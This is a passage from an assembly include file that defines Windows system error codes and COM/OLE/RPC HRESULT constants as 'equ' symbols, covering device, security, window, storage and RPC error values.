ERROR_DEVICE_NOT_PARTITIONED equ 1107
ERROR_UNABLE_TO_LOCK_MEDIA equ 1108
ERROR_UNABLE_TO_UNLOAD_MEDIA equ 1109
ERROR_MEDIA_CHANGED equ 1110
ERROR_BUS_RESET equ 1111
ERROR_NO_MEDIA_IN_DRIVE equ 1112
ERROR_NO_UNICODE_TRANSLATION equ 1113
ERROR_DLL_INIT_FAILED equ 1114
ERROR_SHUTDOWN_IN_PROGRESS equ 1115
ERROR_NO_SHUTDOWN_IN_PROGRESS equ 1116
ERROR_IO_DEVICE equ 1117
ERROR_SERIAL_NO_DEVICE equ 1118
ERROR_IRQ_BUSY equ 1119
ERROR_MORE_WRITES equ 1120
ERROR_COUNTER_TIMEOUT equ 1121
ERROR_FLOPPY_ID_MARK_NOT_FOUND equ 1122
ERROR_FLOPPY_WRONG_CYLINDER equ 1123
ERROR_FLOPPY_UNKNOWN_ERROR equ 1124
ERROR_FLOPPY_BAD_REGISTERS equ 1125
ERROR_DISK_RECALIBRATE_FAILED equ 1126
ERROR_DISK_OPERATION_FAILED equ 1127
ERROR_DISK_RESET_FAILED equ 1128
ERROR_EOM_OVERFLOW equ 1129
ERROR_NOT_ENOUGH_SERVER_MEMORY equ 1130
ERROR_POSSIBLE_DEADLOCK equ 1131
ERROR_MAPPED_ALIGNMENT equ 1132
ERROR_INVALID_PIXEL_FORMAT equ 2000
ERROR_BAD_DRIVER equ 2001
ERROR_INVALID_WINDOW_STYLE equ 2002
ERROR_METAFILE_NOT_SUPPORTED equ 2003
ERROR_TRANSFORM_NOT_SUPPORTED equ 2004
ERROR_CLIPPING_NOT_SUPPORTED equ 2005
ERROR_UNKNOWN_PRINT_MONITOR equ 3000
ERROR_PRINTER_DRIVER_IN_USE equ 3001
ERROR_SPOOL_FILE_NOT_FOUND equ 3002
ERROR_SPL_NO_STARTDOC equ 3003
ERROR_SPL_NO_ADDJOB equ 3004
ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED equ 3005
ERROR_PRINT_MONITOR_ALREADY_INSTALLED equ 3006
ERROR_WINS_INTERNAL equ 4000
ERROR_CAN_NOT_DEL_LOCAL_WINS equ 4001
ERROR_STATIC_INIT equ 4002
ERROR_INC_BACKUP equ 4003
ERROR_FULL_BACKUP equ 4004
ERROR_REC_NON_EXISTENT equ 4005
ERROR_RPL_NOT_ALLOWED equ 4006
SEVERITY_SUCCESS equ 0
SEVERITY_ERROR equ 1
FACILITY_NT_BIT equ 10000000h
NOERROR equ 0
E_UNEXPECTED equ 8000FFFFh
E_NOTIMPL equ 80004001h
E_OUTOFMEMORY equ 8007000Eh
E_INVALIDARG equ 80070057h
E_NOINTERFACE equ 80004002h
E_POINTER equ 80004003h
E_HANDLE equ 80070006h
E_ABORT equ 80004004h
E_FAIL equ 80004005h
E_ACCESSDENIED equ 80070005h
CO_E_INIT_TLS equ 80004006h
CO_E_INIT_SHARED_ALLOCATOR equ 80004007h
CO_E_INIT_MEMORY_ALLOCATOR equ 80004008h
CO_E_INIT_CLASS_CACHE equ 80004009h
CO_E_INIT_RPC_CHANNEL equ 8000400Ah
CO_E_INIT_TLS_SET_CHANNEL_CONTROL equ 8000400Bh
CO_E_INIT_TLS_CHANNEL_CONTROL equ 8000400Ch
CO_E_INIT_UNACCEPTED_USER_ALLOCATOR equ 8000400Dh
CO_E_INIT_SCM_MUTEX_EXISTS equ 8000400Eh
CO_E_INIT_SCM_FILE_MAPPING_EXISTS equ 8000400Fh
CO_E_INIT_SCM_MAP_VIEW_OF_FILE equ 80004010h
CO_E_INIT_SCM_EXEC_FAILURE equ 80004011h
CO_E_INIT_ONLY_SINGLE_THREADED equ 80004012h
S_OK equ 0h
S_FALSE equ 1h
OLE_E_FIRST equ 80040000h
OLE_E_LAST equ 800400FFh
OLE_S_FIRST equ 40000h
OLE_S_LAST equ 400FFh
OLE_E_OLEVERB equ 80040000h
OLE_E_ADVF equ 80040001h
OLE_E_ENUM_NOMORE equ 80040002h
OLE_E_ADVISENOTSUPPORTED equ 80040003h
OLE_E_NOCONNECTION equ 80040004h
OLE_E_NOTRUNNING equ 80040005h
OLE_E_NOCACHE equ 80040006h
OLE_E_BLANK equ 80040007h
OLE_E_CLASSDIFF equ 80040008h
OLE_E_CANT_GETMONIKER equ 80040009h
OLE_E_CANT_BINDTOSOURCE equ 8004000Ah
OLE_E_STATIC equ 8004000Bh
OLE_E_PROMPTSAVECANCELLED equ 8004000Ch
OLE_E_INVALIDRECT equ 8004000Dh
OLE_E_WRONGCOMPOBJ equ 8004000Eh
OLE_E_INVALIDHWND equ 8004000Fh
OLE_E_NOT_INPLACEACTIVE equ 80040010h
OLE_E_CANTCONVERT equ 80040011h
OLE_E_NOSTORAGE equ 80040012h
DV_E_FORMATETC equ 80040064h
DV_E_DVTARGETDEVICE equ 80040065h
DV_E_STGMEDIUM equ 80040066h
DV_E_STATDATA equ 80040067h
DV_E_LINDEX equ 80040068h
DV_E_TYMED equ 80040069h
DV_E_CLIPFORMAT equ 8004006Ah
DV_E_DVASPECT equ 8004006Bh
DV_E_DVTARGETDEVICE_SIZE equ 8004006Ch
DV_E_NOIVIEWOBJECT equ 8004006Dh
DRAGDROP_E_FIRST equ 80040100h
DRAGDROP_E_LAST equ 8004010Fh
DRAGDROP_S_FIRST equ 40100h
DRAGDROP_S_LAST equ 4010Fh
DRAGDROP_E_NOTREGISTERED equ 80040100h
DRAGDROP_E_ALREADYREGISTERED equ 80040101h
DRAGDROP_E_INVALIDHWND equ 80040102h
CLASSFACTORY_E_FIRST equ 80040110h
CLASSFACTORY_E_LAST equ 8004011Fh
CLASSFACTORY_S_FIRST equ 40110h
CLASSFACTORY_S_LAST equ 4011Fh
CLASS_E_NOAGGREGATION equ 80040110h
CLASS_E_CLASSNOTAVAILABLE equ 80040111h
MARSHAL_E_FIRST equ 80040120h
MARSHAL_E_LAST equ 8004012Fh
MARSHAL_S_FIRST equ 40120h
MARSHAL_S_LAST equ 4012Fh
DATA_E_FIRST equ 80040130h
DATA_E_LAST equ 8004013Fh
DATA_S_FIRST equ 40130h
DATA_S_LAST equ 4013Fh
VIEW_E_FIRST equ 80040140h
VIEW_E_LAST equ 8004014Fh
VIEW_S_FIRST equ 40140h
VIEW_S_LAST equ 4014Fh
VIEW_E_DRAW equ 80040140h
REGDB_E_FIRST equ 80040150h
REGDB_E_LAST equ 8004015Fh
REGDB_S_FIRST equ 40150h
REGDB_S_LAST equ 4015Fh
REGDB_E_READREGDB equ 80040150h
REGDB_E_WRITEREGDB equ 80040151h
REGDB_E_KEYMISSING equ 80040152h
REGDB_E_INVALIDVALUE equ 80040153h
REGDB_E_CLASSNOTREG equ 80040154h
REGDB_E_IIDNOTREG equ 80040155h
CACHE_E_FIRST equ 80040170h
CACHE_E_LAST equ 8004017Fh
CACHE_S_FIRST equ 40170h
CACHE_S_LAST equ 4017Fh
CACHE_E_NOCACHE_UPDATED equ 80040170h
OLEOBJ_E_FIRST equ 80040180h
OLEOBJ_E_LAST equ 8004018Fh
OLEOBJ_S_FIRST equ 40180h
OLEOBJ_S_LAST equ 4018Fh
OLEOBJ_E_NOVERBS equ 80040180h
OLEOBJ_E_INVALIDVERB equ 80040181h
CLIENTSITE_E_FIRST equ 80040190h
CLIENTSITE_E_LAST equ 8004019Fh
CLIENTSITE_S_FIRST equ 40190h
CLIENTSITE_S_LAST equ 4019Fh
INPLACE_E_NOTUNDOABLE equ 800401A0h
INPLACE_E_NOTOOLSPACE equ 800401A1h
INPLACE_E_FIRST equ 800401A0h
INPLACE_E_LAST equ 800401AFh
INPLACE_S_FIRST equ 401A0h
INPLACE_S_LAST equ 401AFh
ENUM_E_FIRST equ 800401B0h
ENUM_E_LAST equ 800401BFh
ENUM_S_FIRST equ 401B0h
ENUM_S_LAST equ 401BFh
CONVERT10_E_FIRST equ 800401C0h
CONVERT10_E_LAST equ 800401CFh
CONVERT10_S_FIRST equ 401C0h
CONVERT10_S_LAST equ 401CFh
CONVERT10_E_OLESTREAM_GET equ 800401C0h
CONVERT10_E_OLESTREAM_PUT equ 800401C1h
CONVERT10_E_OLESTREAM_FMT equ 800401C2h
CONVERT10_E_OLESTREAM_BITMAP_TO_DIB equ 800401C3h
CONVERT10_E_STG_FMT equ 800401C4h
CONVERT10_E_STG_NO_STD_STREAM equ 800401C5h
CONVERT10_E_STG_DIB_TO_BITMAP equ 800401C6h
CLIPBRD_E_FIRST equ 800401D0h
CLIPBRD_E_LAST equ 800401DFh
CLIPBRD_S_FIRST equ 401D0h
CLIPBRD_S_LAST equ 401DFh
CLIPBRD_E_CANT_OPEN equ 800401D0h
CLIPBRD_E_CANT_EMPTY equ 800401D1h
CLIPBRD_E_CANT_SET equ 800401D2h
CLIPBRD_E_BAD_DATA equ 800401D3h
CLIPBRD_E_CANT_CLOSE equ 800401D4h
MK_E_FIRST equ 800401E0h
MK_E_LAST equ 800401EFh
MK_S_FIRST equ 401E0h
MK_S_LAST equ 401EFh
MK_E_CONNECTMANUALLY equ 800401E0h
MK_E_EXCEEDEDDEADLINE equ 800401E1h
MK_E_NEEDGENERIC equ 800401E2h
MK_E_UNAVAILABLE equ 800401E3h
MK_E_SYNTAX equ 800401E4h
MK_E_NOOBJECT equ 800401E5h
MK_E_INVALIDEXTENSION equ 800401E6h
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED equ 800401E7h
MK_E_NOTBINDABLE equ 800401E8h
MK_E_NOTBOUND equ 800401E9h
MK_E_CANTOPENFILE equ 800401EAh
MK_E_MUSTBOTHERUSER equ 800401EBh
MK_E_NOINVERSE equ 800401ECh
MK_E_NOSTORAGE equ 800401EDh
MK_E_NOPREFIX equ 800401EEh
MK_E_ENUMERATION_FAILED equ 800401EFh
CO_E_FIRST equ 800401F0h
CO_E_LAST equ 800401FFh
CO_S_FIRST equ 401F0h
CO_S_LAST equ 401FFh
CO_E_NOTINITIALIZED equ 800401F0h
CO_E_ALREADYINITIALIZED equ 800401F1h
CO_E_CANTDETERMINECLASS equ 800401F2h
CO_E_CLASSSTRING equ 800401F3h
CO_E_IIDSTRING equ 800401F4h
CO_E_APPNOTFOUND equ 800401F5h
CO_E_APPSINGLEUSE equ 800401F6h
CO_E_ERRORINAPP equ 800401F7h
CO_E_DLLNOTFOUND equ 800401F8h
CO_E_ERRORINDLL equ 800401F9h
CO_E_WRONGOSFORAPP equ 800401FAh
CO_E_OBJNOTREG equ 800401FBh
CO_E_OBJISREG equ 800401FCh
CO_E_OBJNOTCONNECTED equ 800401FDh
CO_E_APPDIDNTREG equ 800401FEh
CO_E_RELEASED equ 800401FFh
OLE_S_USEREG equ 40000h
OLE_S_STATIC equ 40001h
OLE_S_MAC_CLIPFORMAT equ 40002h
DRAGDROP_S_DROP equ 40100h
DRAGDROP_S_CANCEL equ 40101h
DRAGDROP_S_USEDEFAULTCURSORS equ 40102h
DATA_S_SAMEFORMATETC equ 40130h
VIEW_S_ALREADY_FROZEN equ 40140h
CACHE_S_FORMATETC_NOTSUPPORTED equ 40170h
CACHE_S_SAMECACHE equ 40171h
CACHE_S_SOMECACHES_NOTUPDATED equ 40172h
OLEOBJ_S_INVALIDVERB equ 40180h
OLEOBJ_S_CANNOT_DOVERB_NOW equ 40181h
OLEOBJ_S_INVALIDHWND equ 40182h
INPLACE_S_TRUNCATED equ 401A0h
CONVERT10_S_NO_PRESENTATION equ 401C0h
MK_S_REDUCED_TO_SELF equ 401E2h
MK_S_ME equ 401E4h
MK_S_HIM equ 401E5h
MK_S_US equ 401E6h
MK_S_MONIKERALREADYREGISTERED equ 401E7h
CO_E_CLASS_CREATE_FAILED equ 80080001h
CO_E_SCM_ERROR equ 80080002h
CO_E_SCM_RPC_FAILURE equ 80080003h
CO_E_BAD_PATH equ 80080004h
CO_E_SERVER_EXEC_FAILURE equ 80080005h
CO_E_OBJSRV_RPC_FAILURE equ 80080006h
MK_E_NO_NORMALIZED equ 80080007h
CO_E_SERVER_STOPPING equ 80080008h
MEM_E_INVALID_ROOT equ 80080009h
MEM_E_INVALID_LINK equ 80080010h
MEM_E_INVALID_SIZE equ 80080011h
DISP_E_UNKNOWNINTERFACE equ 80020001h
DISP_E_MEMBERNOTFOUND equ 80020003h
DISP_E_PARAMNOTFOUND equ 80020004h
DISP_E_TYPEMISMATCH equ 80020005h
DISP_E_UNKNOWNNAME equ 80020006h
DISP_E_NONAMEDARGS equ 80020007h
DISP_E_BADVARTYPE equ 80020008h
DISP_E_EXCEPTION equ 80020009h
DISP_E_OVERFLOW equ 8002000Ah
DISP_E_BADINDEX equ 8002000Bh
DISP_E_UNKNOWNLCID equ 8002000Ch
DISP_E_ARRAYISLOCKED equ 8002000Dh
DISP_E_BADPARAMCOUNT equ 8002000Eh
DISP_E_PARAMNOTOPTIONAL equ 8002000Fh
DISP_E_BADCALLEE equ 80020010h
DISP_E_NOTACOLLECTION equ 80020011h
TYPE_E_BUFFERTOOSMALL equ 80028016h
TYPE_E_INVDATAREAD equ 80028018h
TYPE_E_UNSUPFORMAT equ 80028019h
TYPE_E_REGISTRYACCESS equ 8002801Ch
TYPE_E_LIBNOTREGISTERED equ 8002801Dh
TYPE_E_UNDEFINEDTYPE equ 80028027h
TYPE_E_QUALIFIEDNAMEDISALLOWED equ 80028028h
TYPE_E_INVALIDSTATE equ 80028029h
TYPE_E_WRONGTYPEKIND equ 8002802Ah
TYPE_E_ELEMENTNOTFOUND equ 8002802Bh
TYPE_E_AMBIGUOUSNAME equ 8002802Ch
TYPE_E_NAMECONFLICT equ 8002802Dh
TYPE_E_UNKNOWNLCID equ 8002802Eh
TYPE_E_DLLFUNCTIONNOTFOUND equ 8002802Fh
TYPE_E_BADMODULEKIND equ 800288BDh
TYPE_E_SIZETOOBIG equ 800288C5h
TYPE_E_DUPLICATEID equ 800288C6h
TYPE_E_INVALIDID equ 800288CFh
TYPE_E_TYPEMISMATCH equ 80028CA0h
TYPE_E_OUTOFBOUNDS equ 80028CA1h
TYPE_E_IOERROR equ 80028CA2h
TYPE_E_CANTCREATETMPFILE equ 80028CA3h
TYPE_E_CANTLOADLIBRARY equ 80029C4Ah
TYPE_E_INCONSISTENTPROPFUNCS equ 80029C83h
TYPE_E_CIRCULARTYPE equ 80029C84h
STG_E_INVALIDFUNCTION equ 80030001h
STG_E_FILENOTFOUND equ 80030002h
STG_E_PATHNOTFOUND equ 80030003h
STG_E_TOOMANYOPENFILES equ 80030004h
STG_E_ACCESSDENIED equ 80030005h
STG_E_INVALIDHANDLE equ 80030006h
STG_E_INSUFFICIENTMEMORY equ 80030008h
STG_E_INVALIDPOINTER equ 80030009h
STG_E_NOMOREFILES equ 80030012h
STG_E_DISKISWRITEPROTECTED equ 80030013h
STG_E_SEEKERROR equ 80030019h
STG_E_WRITEFAULT equ 8003001Dh
STG_E_READFAULT equ 8003001Eh
STG_E_SHAREVIOLATION equ 80030020h
STG_E_LOCKVIOLATION equ 80030021h
STG_E_FILEALREADYEXISTS equ 80030050h
STG_E_INVALIDPARAMETER equ 80030057h
STG_E_MEDIUMFULL equ 80030070h
STG_E_ABNORMALAPIEXIT equ 800300FAh
STG_E_INVALIDHEADER equ 800300FBh
STG_E_INVALIDNAME equ 800300FCh
STG_E_UNKNOWN equ 800300FDh
STG_E_UNIMPLEMENTEDFUNCTION equ 800300FEh
STG_E_INVALIDFLAG equ 800300FFh
STG_E_INUSE equ 80030100h
STG_E_NOTCURRENT equ 80030101h
STG_E_REVERTED equ 80030102h
STG_E_CANTSAVE equ 80030103h
STG_E_OLDFORMAT equ 80030104h
STG_E_OLDDLL equ 80030105h
STG_E_SHAREREQUIRED equ 80030106h
STG_E_NOTFILEBASEDSTORAGE equ 80030107h
STG_E_EXTANTMARSHALLINGS equ 80030108h
STG_S_CONVERTED equ 30200h
RPC_E_CALL_REJECTED equ 80010001h
RPC_E_CALL_CANCELED equ 80010002h
RPC_E_CANTPOST_INSENDCALL equ 80010003h
RPC_E_CANTCALLOUT_INASYNCCALL equ 80010004h
RPC_E_CANTCALLOUT_INEXTERNALCALL equ 80010005h
RPC_E_CONNECTION_TERMINATED equ 80010006h
RPC_E_SERVER_DIED equ 80010007h
RPC_E_CLIENT_DIED equ 80010008h
RPC_E_INVALID_DATAPACKET equ 80010009h
RPC_E_CANTTRANSMIT_CALL equ 8001000Ah
RPC_E_CLIENT_CANTMARSHAL_DATA equ 8001000Bh
RPC_E_CLIENT_CANTUNMARSHAL_DATA equ 8001000Ch
RPC_E_SERVER_CANTMARSHAL_DATA equ 8001000Dh
RPC_E_SERVER_CANTUNMARSHAL_DATA equ 8001000Eh
RPC_E_INVALID_DATA equ 8001000Fh
RPC_E_INVALID_PARAMETER equ 80010010h
RPC_E_CANTCALLOUT_AGAIN equ 80010011h
RPC_E_SERVER_DIED_DNE equ 80010012h
RPC_E_SYS_CALL_FAILED equ 80010100h
RPC_E_OUT_OF_RESOURCES equ 80010101h
RPC_E_ATTEMPTED_MULTITHREAD equ 80010102h
RPC_E_NOT_REGISTERED equ 80010103h
RPC_E_FAULT equ 80010104h
RPC_E_SERVERFAULT equ 80010105h
RPC_E_CHANGED_MODE equ 80010106h
RPC_E_INVALIDMETHOD equ 80010107h
RPC_E_DISCONNECTED equ 80010108h
RPC_E_RETRY equ 80010109h
RPC_E_SERVERCALL_RETRYLATER equ 8001010Ah
RPC_E_SERVERCALL_REJECTED equ 8001010Bh
RPC_E_INVALID_CALLDATA equ 8001010Ch
RPC_E_CANTCALLOUT_ININPUTSYNCCALL equ 8001010Dh
RPC_E_WRONG_THREAD equ 8001010Eh
RPC_E_THREAD_NOT_INIT equ 8001010Fh
RPC_E_UNEXPECTED equ 8001FFFFh
ERROR_BAD_USERNAME equ 2202
ERROR_NOT_CONNECTED equ 2250
ERROR_OPEN_FILES equ 2401
ERROR_DEVICE_IN_USE equ 2404
ERROR_BAD_DEVICE equ 1200
ERROR_CONNECTION_UNAVAIL equ 1201
ERROR_DEVICE_ALREADY_REMEMBERED equ 1202
ERROR_NO_NET_OR_BAD_PATH equ 1203
ERROR_BAD_PROVIDER equ 1204
ERROR_CANNOT_OPEN_PROFILE equ 1205
ERROR_BAD_PROFILE equ 1206
ERROR_NOT_CONTAINER equ 1207
ERROR_EXTENDED_ERROR equ 1208
ERROR_INVALID_GROUPNAME equ 1209
ERROR_INVALID_COMPUTERNAME equ 1210
ERROR_INVALID_EVENTNAME equ 1211
ERROR_INVALID_DOMAINNAME equ 1212
ERROR_INVALID_SERVICENAME equ 1213
ERROR_INVALID_NETNAME equ 1214
ERROR_INVALID_SHARENAME equ 1215
ERROR_INVALID_PASSWORDNAME equ 1216
ERROR_INVALID_MESSAGENAME equ 1217
ERROR_INVALID_MESSAGEDEST equ 1218
ERROR_SESSION_CREDENTIAL_CONFLICT equ 1219
ERROR_REMOTE_SESSION_LIMIT_EXCEEDED equ 1220
ERROR_DUP_DOMAINNAME equ 1221
ERROR_NO_NETWORK equ 1222
ERROR_NOT_ALL_ASSIGNED equ 1300
ERROR_SOME_NOT_MAPPED equ 1301
ERROR_NO_QUOTAS_FOR_ACCOUNT equ 1302
ERROR_LOCAL_USER_SESSION_KEY equ 1303
ERROR_NULL_LM_PASSWORD equ 1304
ERROR_UNKNOWN_REVISION equ 1305
ERROR_REVISION_MISMATCH equ 1306
ERROR_INVALID_OWNER equ 1307
ERROR_INVALID_PRIMARY_GROUP equ 1308
ERROR_NO_IMPERSONATION_TOKEN equ 1309
ERROR_CANT_DISABLE_MANDATORY equ 1310
ERROR_NO_LOGON_SERVERS equ 1311
ERROR_NO_SUCH_LOGON_SESSION equ 1312
ERROR_NO_SUCH_PRIVILEGE equ 1313
ERROR_PRIVILEGE_NOT_HELD equ 1314
ERROR_INVALID_ACCOUNT_NAME equ 1315
ERROR_USER_EXISTS equ 1316
ERROR_NO_SUCH_USER equ 1317
ERROR_GROUP_EXISTS equ 1318
ERROR_NO_SUCH_GROUP equ 1319
ERROR_MEMBER_IN_GROUP equ 1320
ERROR_MEMBER_NOT_IN_GROUP equ 1321
ERROR_LAST_ADMIN equ 1322
ERROR_WRONG_PASSWORD equ 1323
ERROR_ILL_FORMED_PASSWORD equ 1324
ERROR_PASSWORD_RESTRICTION equ 1325
ERROR_LOGON_FAILURE equ 1326
ERROR_ACCOUNT_RESTRICTION equ 1327
ERROR_INVALID_LOGON_HOURS equ 1328
ERROR_INVALID_WORKSTATION equ 1329
ERROR_PASSWORD_EXPIRED equ 1330
ERROR_ACCOUNT_DISABLED equ 1331
ERROR_NONE_MAPPED equ 1332
ERROR_TOO_MANY_LUIDS_REQUESTED equ 1333
ERROR_LUIDS_EXHAUSTED equ 1334
ERROR_INVALID_SUB_AUTHORITY equ 1335
ERROR_INVALID_ACL equ 1336
ERROR_INVALID_SID equ 1337
ERROR_INVALID_SECURITY_DESCR equ 1338
ERROR_BAD_INHERITANCE_ACL equ 1340
ERROR_SERVER_DISABLED equ 1341
ERROR_SERVER_NOT_DISABLED equ 1342
ERROR_INVALID_ID_AUTHORITY equ 1343
ERROR_ALLOTTED_SPACE_EXCEEDED equ 1344
ERROR_INVALID_GROUP_ATTRIBUTES equ 1345
ERROR_BAD_IMPERSONATION_LEVEL equ 1346
ERROR_CANT_OPEN_ANONYMOUS equ 1347
ERROR_BAD_VALIDATION_CLASS equ 1348
ERROR_BAD_TOKEN_TYPE equ 1349
ERROR_NO_SECURITY_ON_OBJECT equ 1350
ERROR_CANT_ACCESS_DOMAIN_INFO equ 1351
ERROR_INVALID_SERVER_STATE equ 1352
ERROR_INVALID_DOMAIN_STATE equ 1353
ERROR_INVALID_DOMAIN_ROLE equ 1354
ERROR_NO_SUCH_DOMAIN equ 1355
ERROR_DOMAIN_EXISTS equ 1356
ERROR_DOMAIN_LIMIT_EXCEEDED equ 1357
ERROR_INTERNAL_DB_CORRUPTION equ 1358
ERROR_INTERNAL_ERROR equ 1359
ERROR_GENERIC_NOT_MAPPED equ 1360
ERROR_BAD_DESCRIPTOR_FORMAT equ 1361
ERROR_NOT_LOGON_PROCESS equ 1362
ERROR_LOGON_SESSION_EXISTS equ 1363
ERROR_NO_SUCH_PACKAGE equ 1364
ERROR_BAD_LOGON_SESSION_STATE equ 1365
ERROR_LOGON_SESSION_COLLISION equ 1366
ERROR_INVALID_LOGON_TYPE equ 1367
ERROR_CANNOT_IMPERSONATE equ 1368
ERROR_RXACT_INVALID_STATE equ 1369
ERROR_RXACT_COMMIT_FAILURE equ 1370
ERROR_SPECIAL_ACCOUNT equ 1371
ERROR_SPECIAL_GROUP equ 1372
ERROR_SPECIAL_USER equ 1373
ERROR_MEMBERS_PRIMARY_GROUP equ 1374
ERROR_TOKEN_ALREADY_IN_USE equ 1375
ERROR_NO_SUCH_ALIAS equ 1376
ERROR_MEMBER_NOT_IN_ALIAS equ 1377
ERROR_MEMBER_IN_ALIAS equ 1378
ERROR_ALIAS_EXISTS equ 1379
ERROR_LOGON_NOT_GRANTED equ 1380
ERROR_TOO_MANY_SECRETS equ 1381
ERROR_SECRET_TOO_LONG equ 1382
ERROR_INTERNAL_DB_ERROR equ 1383
ERROR_TOO_MANY_CONTEXT_IDS equ 1384
ERROR_LOGON_TYPE_NOT_GRANTED equ 1385
ERROR_NT_CROSS_ENCRYPTION_REQUIRED equ 1386
ERROR_NO_SUCH_MEMBER equ 1387
ERROR_INVALID_MEMBER equ 1388
ERROR_TOO_MANY_SIDS equ 1389
ERROR_LM_CROSS_ENCRYPTION_REQUIRED equ 1390
ERROR_NO_INHERITANCE equ 1391
ERROR_FILE_CORRUPT equ 1392
ERROR_DISK_CORRUPT equ 1393
ERROR_NO_USER_SESSION_KEY equ 1394
ERROR_INVALID_WINDOW_HANDLE equ 1400
ERROR_INVALID_MENU_HANDLE equ 1401
ERROR_INVALID_CURSOR_HANDLE equ 1402
ERROR_INVALID_ACCEL_HANDLE equ 1403
ERROR_INVALID_HOOK_HANDLE equ 1404
ERROR_INVALID_DWP_HANDLE equ 1405
ERROR_TLW_WITH_WSCHILD equ 1406
ERROR_CANNOT_FIND_WND_CLASS equ 1407
ERROR_WINDOW_OF_OTHER_THREAD equ 1408
ERROR_HOTKEY_ALREADY_REGISTERED equ 1409
ERROR_CLASS_ALREADY_EXISTS equ 1410
ERROR_CLASS_DOES_NOT_EXIST equ 1411
ERROR_CLASS_HAS_WINDOWS equ 1412
ERROR_INVALID_INDEX equ 1413
ERROR_INVALID_ICON_HANDLE equ 1414
ERROR_PRIVATE_DIALOG_INDEX equ 1415
ERROR_LISTBOX_ID_NOT_FOUND equ 1416
ERROR_NO_WILDCARD_CHARACTERS equ 1417
ERROR_CLIPBOARD_NOT_OPEN equ 1418
ERROR_HOTKEY_NOT_REGISTERED equ 1419
ERROR_WINDOW_NOT_DIALOG equ 1420
ERROR_CONTROL_ID_NOT_FOUND equ 1421
ERROR_INVALID_COMBOBOX_MESSAGE equ 1422
ERROR_WINDOW_NOT_COMBOBOX equ 1423
ERROR_INVALID_EDIT_HEIGHT equ 1424
ERROR_DC_NOT_FOUND equ 1425
ERROR_INVALID_HOOK_FILTER equ 1426
ERROR_INVALID_FILTER_PROC equ 1427
ERROR_HOOK_NEEDS_HMOD equ 1428
ERROR_PUBLIC_ONLY_HOOK equ 1429
ERROR_JOURNAL_HOOK_SET equ 1430
ERROR_HOOK_NOT_INSTALLED equ 1431
ERROR_INVALID_LB_MESSAGE equ 1432
ERROR_SETCOUNT_ON_BAD_LB equ 1433
ERROR_LB_WITHOUT_TABSTOPS equ 1434
ERROR_DESTROY_OBJECT_OF_OTHER_THREAD equ 1435
ERROR_CHILD_WINDOW_MENU equ 1436
ERROR_NO_SYSTEM_MENU equ 1437
ERROR_INVALID_MSGBOX_STYLE equ 1438
ERROR_INVALID_SPI_VALUE equ 1439
ERROR_SCREEN_ALREADY_LOCKED equ 1440
ERROR_HWNDS_HAVE_DIFF_PARENT equ 1441
ERROR_NOT_CHILD_WINDOW equ 1442
ERROR_INVALID_GW_COMMAND equ 1443
ERROR_INVALID_THREAD_ID equ 1444
ERROR_NON_MDICHILD_WINDOW equ 1445
ERROR_POPUP_ALREADY_ACTIVE equ 1446
ERROR_NO_SCROLLBARS equ 1447
ERROR_INVALID_SCROLLBAR_RANGE equ 1448
ERROR_INVALID_SHOWWIN_COMMAND equ 1449
ERROR_EVENTLOG_FILE_CORRUPT equ 1500
ERROR_EVENTLOG_CANT_START equ 1501
ERROR_LOG_FILE_FULL equ 1502
ERROR_EVENTLOG_FILE_CHANGED equ 1503
RPC_S_INVALID_STRING_BINDING equ 1700
RPC_S_WRONG_KIND_OF_BINDING equ 1701
RPC_S_INVALID_BINDING equ 1702
RPC_S_PROTSEQ_NOT_SUPPORTED equ 1703
RPC_S_INVALID_RPC_PROTSEQ equ 1704
RPC_S_INVALID_STRING_UUID equ 1705
RPC_S_INVALID_ENDPOINT_FORMAT equ 1706
RPC_S_INVALID_NET_ADDR equ 1707
RPC_S_NO_ENDPOINT_FOUND equ 1708
RPC_S_INVALID_TIMEOUT equ 1709
RPC_S_OBJECT_NOT_FOUND equ 1710
RPC_S_ALREADY_REGISTERED equ 1711
RPC_S_TYPE_ALREADY_REGISTERED equ 1712
RPC_S_ALREADY_LISTENING equ 1713
RPC_S_NO_PROTSEQS_REGISTERED equ 1714
RPC_S_NOT_LISTENING equ 1715
RPC_S_UNKNOWN_MGR_TYPE equ 1716
RPC_S_UNKNOWN_IF equ 1717
RPC_S_NO_BINDINGS equ 1718
RPC_S_NO_PROTSEQS equ 1719
RPC_S_CANT_CREATE_ENDPOINT equ 1720
RPC_S_OUT_OF_RESOURCES equ 1721
RPC_S_SERVER_UNAVAILABLE equ 1722
RPC_S_SERVER_TOO_BUSY equ 1723
RPC_S_INVALID_NETWORK_OPTIONS equ 1724
RPC_S_NO_CALL_ACTIVE equ 1725
RPC_S_CALL_FAILED equ 1726
RPC_S_CALL_FAILED_DNE equ 1727
RPC_S_PROTOCOL_ERROR equ 1728
RPC_S_UNSUPPORTED_TRANS_SYN equ 1730
RPC_S_UNSUPPORTED_TYPE equ 1732
RPC_S_INVALID_TAG equ 1733
RPC_S_INVALID_BOUND equ 1734
RPC_S_NO_ENTRY_NAME equ 1735
RPC_S_INVALID_NAME_SYNTAX equ 1736
RPC_S_UNSUPPORTED_NAME_SYNTAX equ 1737
RPC_S_UUID_NO_ADDRESS equ 1739
RPC_S_DUPLICATE_ENDPOINT equ 1740
RPC_S_UNKNOWN_AUTHN_TYPE equ 1741
RPC_S_MAX_CALLS_TOO_SMALL equ 1742
RPC_S_STRING_TOO_LONG equ 1743
RPC_S_PROTSEQ_NOT_FOUND equ 1744
RPC_S_PROCNUM_OUT_OF_RANGE equ 1745
RPC_S_BINDING_HAS_NO_AUTH equ 1746
RPC_S_UNKNOWN_AUTHN_SERVICE equ 1747
RPC_S_UNKNOWN_AUTHN_LEVEL equ 1748
RPC_S_INVALID_AUTH_IDENTITY equ 1749
RPC_S_UNKNOWN_AUTHZ_SERVICE equ 1750
EPT_S_INVALID_ENTRY equ 1751
EPT_S_CANT_PERFORM_OP equ 1752
EPT_S_NOT_REGISTERED equ 1753
RPC_S_NOTHING_TO_EXPORT equ 1754
RPC_S_INCOMPLETE_NAME equ 1755
RPC_S_INVALID_VERS_OPTION equ 1756
RPC_S_NO_MORE_MEMBERS equ 1757
RPC_S_NOT_ALL_OBJS_UNEXPORTED equ 1758
RPC_S_INTERFACE_NOT_FOUND equ 1759
RPC_S_ENTRY_ALREADY_EXISTS equ 1760
RPC_S_ENTRY_NOT_FOUND equ 1761
RPC_S_NAME_SERVICE_UNAVAILABLE equ 1762
RPC_S_INVALID_NAF_ID equ 1763
RPC_S_CANNOT_SUPPORT equ 1764
RPC_S_NO_CONTEXT_AVAILABLE equ 1765
